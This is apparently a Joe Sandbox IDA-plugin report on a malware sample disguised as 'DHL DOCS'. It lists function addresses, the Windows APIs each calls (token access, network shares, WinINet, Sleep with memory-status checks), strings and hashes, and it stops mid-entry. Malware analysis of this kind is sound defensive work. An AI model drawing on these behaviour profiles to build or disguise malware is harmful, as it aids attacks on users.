Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: Color$ModeObjectStockText
String ID:
API String ID: 4037423528-0
Opcode ID: 1a5f89a8bb4aa0e982b8e856b272ac6ac4c7236b6807232ad52dbb6283a294b5
Instruction ID: 2d13335ff2d00b7f21e4ca09bad725c82fae4af3c3d8281397cebabc8ed12257
Opcode Fuzzy Hash: 1a5f89a8bb4aa0e982b8e856b272ac6ac4c7236b6807232ad52dbb6283a294b5
Instruction Fuzzy Hash: 3AE06D35645280AAEB615F78BC0DBE83F20AB16336F248219F6FE580E2C7B156509B10

Function 0021162B Relevance: 6.0, APIs: 4, Instructions: 22threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 00211634
OpenThreadToken.ADVAPI32(00000000,?,?,?,002111D9), ref: 0021163B
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,002111D9), ref: 00211648
OpenProcessToken.ADVAPI32(00000000,?,?,?,002111D9), ref: 0021164F

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: fa6b2e31a410da755bfb75071d8747bdab15f1772bb591f8eb0339c7af4c2d3a
Instruction ID: a70061a4cdf4c98216b10212b7c76d852c3d58476f9bfac58e29541c6130d614
Opcode Fuzzy Hash: fa6b2e31a410da755bfb75071d8747bdab15f1772bb591f8eb0339c7af4c2d3a
Instruction Fuzzy Hash: 87E08635603211DBD7B01FE4BD0DB863BBCAF567D1F244808F745C9090D6B44490CB50

Function 0020D858 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 0020D858
GetDC.USER32(00000000), ref: 0020D862
GetDeviceCaps.GDI32(00000000,0000000C), ref: 0020D882
ReleaseDC.USER32(?), ref: 0020D8A3

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: e9f407306eb0edd863328d1754faa6dce605d433a5608b964fff8b08b8c30b3c
Instruction ID: e88c1a5e627de7bba64b76e695809260660b6b2b043a46da03edf64f06220cce
Opcode Fuzzy Hash: e9f407306eb0edd863328d1754faa6dce605d433a5608b964fff8b08b8c30b3c
Instruction Fuzzy Hash: 46E01AB8801204DFCB819FE8E80CA6DBBB5FB49310F21D059F816E7260C7788911AF40

Function 0020D86C Relevance: 6.0, APIs: 4, Instructions: 18COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 0020D86C
GetDC.USER32(00000000), ref: 0020D876
GetDeviceCaps.GDI32(00000000,0000000C), ref: 0020D882
ReleaseDC.USER32(?), ref: 0020D8A3

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 066386d898efb897627a41358c21fedcc243c96aff51506dc9323a7342039e46
Instruction ID: 72eabb65a76469d6b8ca09533813c725c443d78585f36074976b8d80c7239e3d
Opcode Fuzzy Hash: 066386d898efb897627a41358c21fedcc243c96aff51506dc9323a7342039e46
Instruction Fuzzy Hash: E9E04F78C01200DFCF909FB8E80C66DBBB5FB48310F219048F916E7260C77859019F40

Function 00224D87 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230shareCOMMON

Download Yara Rule

APIs

Part of subcall function 001B7620: _wcslen.LIBCMT ref: 001B7625

WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00224ED4

Strings

LPT, xrefs: 00224DFB
*, xrefs: 00224E10

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: Connection_wcslen
String ID: *$LPT
API String ID: 1725874428-3443410124
Opcode ID: 5208a6a32f9ed78b86ecaafac7f38533e58d5c96ebe0a3ca864281f8bf186152
Instruction ID: 1c867d3ef3199d04c06bbe4d146e8e27255cbbb60fbee8a3cf97955425ff44a2
Opcode Fuzzy Hash: 5208a6a32f9ed78b86ecaafac7f38533e58d5c96ebe0a3ca864281f8bf186152
Instruction Fuzzy Hash: 8191C375A10215EFCB14EF98D584EA9BBF1BF88304F158099E40A9F7A2C771ED85CB90

Function 001DE27D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 001DE30D

Strings

pow, xrefs: 001DE2E5, 001DE302

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: c1479c4527112b9b27b66f33c146ecbeebc736926aa91d6b6e335929f93a253b
Instruction ID: f1e43efb31292c1830e180c05cc9f5c92ed871272deed3fa52ea42e080f3c91c
Opcode Fuzzy Hash: c1479c4527112b9b27b66f33c146ecbeebc736926aa91d6b6e335929f93a253b
Instruction Fuzzy Hash: 27519E61A0CA42A6EB157715DD0537D3BE8FB50742F304D9AF0D58B3E8EB308C959A86

Function 00237771 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(0020569E,00000000,?,0024CC08,?,00000000,00000000), ref: 002378DD

Part of subcall function 001B6B57: _wcslen.LIBCMT ref: 001B6B6A

CharUpperBuffW.USER32(0020569E,00000000,?,0024CC08,00000000,?,00000000,00000000), ref: 0023783B

Strings

<s', xrefs: 002377C8

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: BuffCharUpper$_wcslen
String ID: <s'
API String ID: 3544283678-1932024504
Opcode ID: 32db055ae8cbdd819266a1a8650df80d83f4ccfe1b042e61a3a5c2fc71615f80
Instruction ID: 6629b12767f69b8407eeb43c9f219f794a6ca593ea4213d65e551b768db2a681
Opcode Fuzzy Hash: 32db055ae8cbdd819266a1a8650df80d83f4ccfe1b042e61a3a5c2fc71615f80
Instruction Fuzzy Hash: D0613BB2924219EACF14EFA4CC91DFDB3B8BF28700F544129F542A7191EB749A15DBA0

Function 001CE187 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON

Download Yara Rule

Strings

#, xrefs: 001CE1B1

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: f2ac39e8b1b0e4c6cf53bd819b13e9d5f87c90ff3a699f381aaa6ca9ba1602e5
Instruction ID: ac7be255200dba730d163655595e12842e9eb1815acfad704ebd2c933bb78353
Opcode Fuzzy Hash: f2ac39e8b1b0e4c6cf53bd819b13e9d5f87c90ff3a699f381aaa6ca9ba1602e5
Instruction Fuzzy Hash: ED51F035500346DFDF19DF28C481BBABBA8EF65310F258459E8919B2E1D734DDA2CB90

Function 001CF291 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 001CF2A2
GlobalMemoryStatusEx.KERNEL32(?), ref: 001CF2BB

Strings

@, xrefs: 001CF2AF

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: 2e4be23d674aeb1d385ee00f81889bf6c351caf9b3a9d1a65acdb931d13da1a7
Instruction ID: 858963f615491f657ccf784da16378cb8b6c15f65ce8e6b5a243d2fd8642fd4f
Opcode Fuzzy Hash: 2e4be23d674aeb1d385ee00f81889bf6c351caf9b3a9d1a65acdb931d13da1a7
Instruction Fuzzy Hash: CC5135714087449BD320AF14EC8ABABBBF8FB95300F81885DF5D9811A5EB709529CB66

Function 00235745 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,00000003,?,?), ref: 002357E0
_wcslen.LIBCMT ref: 002357EC

Strings

CALLARGARRAY, xrefs: 002357E6, 002357EB

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: BuffCharUpper_wcslen
String ID: CALLARGARRAY
API String ID: 157775604-1150593374
Opcode ID: d56b7cb34521d916e697a9703dc86148786bc7595535b055a5368cdd2dbda753
Instruction ID: f447a937a1b72c64ae235a2352a895cb2e318bbc98f0f550a24008f215404bff
Opcode Fuzzy Hash: d56b7cb34521d916e697a9703dc86148786bc7595535b055a5368cdd2dbda753
Instruction Fuzzy Hash: 4E41A071A1021A9FCB14DFA9C8859EEBBF5EF69310F204029E509A7251E7709D91CB90

Function 0022D0F4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98networkCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0022D130
InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 0022D13A

Strings

|, xrefs: 0022D10B

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: CrackInternet_wcslen
String ID: |
API String ID: 596671847-2343686810
Opcode ID: d33c3c542ee9806752e603cdbfb2b7955d587e327f5f97af9a172cc65ec4bfa2
Instruction ID: f695fb563630c114cea886aba31461950884e63b17d6915eb11fdeacb1d7e0df
Opcode Fuzzy Hash: d33c3c542ee9806752e603cdbfb2b7955d587e327f5f97af9a172cc65ec4bfa2
Instruction Fuzzy Hash: D0313E75D10219ABCF15EFA4DC85AEEBFB9FF14300F100019F819A6166DB35A916DB50

Function 0024356C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 00243621
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 0024365C

Strings

static, xrefs: 002435BC

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: bc6264172cafb2bf5e19379ab36efe6a2fc5d4d5cf11ac0f263374e239c7c67a
Instruction ID: 6401768460c93f18d6b8e17d80b511ec904c0e65a3def622fb0a900d17c66c30
Opcode Fuzzy Hash: bc6264172cafb2bf5e19379ab36efe6a2fc5d4d5cf11ac0f263374e239c7c67a
Instruction Fuzzy Hash: EF319E71120605AEDB14DF28DC81EFB73ADFF98724F118619F8A597280DB70ADA1CB64

Function 001C97C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 80COMMON

Download Yara Rule

APIs

Part of subcall function 001C9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 001C9BB2

Part of subcall function 001C9944: GetWindowLongW.USER32(?,000000EB), ref: 001C9952

GetParent.USER32(?), ref: 002073A3
DefDlgProcW.USER32(?,00000133,?,?,?,?), ref: 0020742D

Strings

8], xrefs: 001C980F, 002073D2, 002073F9

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: LongWindow$ParentProc
String ID: 8]
API String ID: 2181805148-438778366
Opcode ID: fde637188c0f1bbb624db1b367bdb2b669375974e7dfcc6ce22da2f956443e1e
Instruction ID: 000a452eb29f25ff3a3cc78e1db5119a54589703cf68e6f66b852ff248ae9755
Opcode Fuzzy Hash: fde637188c0f1bbb624db1b367bdb2b669375974e7dfcc6ce22da2f956443e1e
Instruction Fuzzy Hash: 3C21D334A11208AFDB259F28DC4DEA93BA5EF56370F144299F9254B2F2C330ED61DB50

Function 002431EF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0024327C
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00243287

Strings

Combobox, xrefs: 00243249

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: 647791631cf878f10f58e400f1094a12156a34228579ab0dead35734b93a0634
Instruction ID: 55a198b6d30c64e21f1866cb00862089565b6b1c4ab536601f1ef95d1c180f13
Opcode Fuzzy Hash: 647791631cf878f10f58e400f1094a12156a34228579ab0dead35734b93a0634
Instruction Fuzzy Hash: D011B2713202097FFF29DE54DC85EBB376AEB98364F104125FD189B290D6B19D618B60

Function 0021EF10 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 70COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0021EF1D

Strings

, xrefs: 0021EF1B
HANDLE, xrefs: 0021EF16

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: _wcslen
String ID: $HANDLE
API String ID: 176396367-4040957895
Opcode ID: 48deb52f5dcb1a1ec2d68bc8dc9d77364c80f45fa2f2292cbd0477775692746a
Instruction ID: b2307d7150007cd79888ebbd1655713500235357677772f5ae2f1e3f55d52f11
Opcode Fuzzy Hash: 48deb52f5dcb1a1ec2d68bc8dc9d77364c80f45fa2f2292cbd0477775692746a
Instruction Fuzzy Hash: 0411DF715301159AEB288E14DC89BEDB3E8DFA0725F62406AEC01CA4C4E7B09AD28714

Function 002432A6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

CreatePopupMenu.USER32 ref: 002432C7
CreatePopupMenu.USER32 ref: 00243339

Strings

8], xrefs: 00243313, 0024334B

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: CreateMenuPopup
String ID: 8]
API String ID: 3826294624-438778366
Opcode ID: ffe89c125bcba97405f11b453f811e598ba2e8c5f7a440e074c038c114763a27
Instruction ID: 1a3b73c52395f292c2b744e3c6df9ac5a5bbe3b43aeb8248c54a1ae1adae1509
Opcode Fuzzy Hash: ffe89c125bcba97405f11b453f811e598ba2e8c5f7a440e074c038c114763a27
Instruction Fuzzy Hash: 3C216D386052059FDB29CF28D446BD6BBE5FB0A364F08805AEC998B351D771AE12CF51

Function 00243710 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 001B600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 001B604C
Part of subcall function 001B600E: GetStockObject.GDI32(00000011), ref: 001B6060
Part of subcall function 001B600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 001B606A

GetWindowRect.USER32(00000000,?), ref: 0024377A
GetSysColor.USER32(00000012), ref: 00243794

Strings

static, xrefs: 00243757

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: 6edf2aeeaad315aa84b1be1f4f1a756cd19283b803d6ed99bf04196d0013aaf7
Instruction ID: 0c87c4e3d0040624784bc55eb94f1eea3e1bb3d74b574db20a323587160c23a0
Opcode Fuzzy Hash: 6edf2aeeaad315aa84b1be1f4f1a756cd19283b803d6ed99bf04196d0013aaf7
Instruction Fuzzy Hash: F51129B262020AAFDB05DFA8CC46AEE7BB8EB09314F104515F995E2250D775E8619B50

Function 00246181 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 002461FC
SendMessageW.USER32(?,00000194,00000000,00000000), ref: 00246225

Strings

8], xrefs: 002461A2

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: MessageSend
String ID: 8]
API String ID: 3850602802-438778366
Opcode ID: 0ef6be46df88ec64320963dddd5ae668ad3a126f799bb2e8e237df767ea3e1d1
Instruction ID: 74509c34080580e5425601d7d5223471357c8296d1b8c01fd894163bac244655
Opcode Fuzzy Hash: 0ef6be46df88ec64320963dddd5ae668ad3a126f799bb2e8e237df767ea3e1d1
Instruction Fuzzy Hash: 1C119031160215BEEB19CF68DD1DFB93BA8EB07310F104115FE169A1D1D2F0DA60DB52

Function 0022CD1E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0022CD7D
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 0022CDA6

Strings

<local>, xrefs: 0022CD66

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: 6108039f5f0cc1bc53bc9d85dd15bae285e482b112d6760a2a7e43bc1e21fe5b
Instruction ID: b90a2ef211f1dd138c58be928bfef25b91f87e142eecd1b566f4cb321e0281a3
Opcode Fuzzy Hash: 6108039f5f0cc1bc53bc9d85dd15bae285e482b112d6760a2a7e43bc1e21fe5b
Instruction Fuzzy Hash: B811C6752256327AD7384FA6AC49FEBBE6CEF127A4F204236B10983080D7749865D6F0

Function 00243429 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 002434AB
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 002434BA

Strings

edit, xrefs: 0024348F

Memory Dump Source

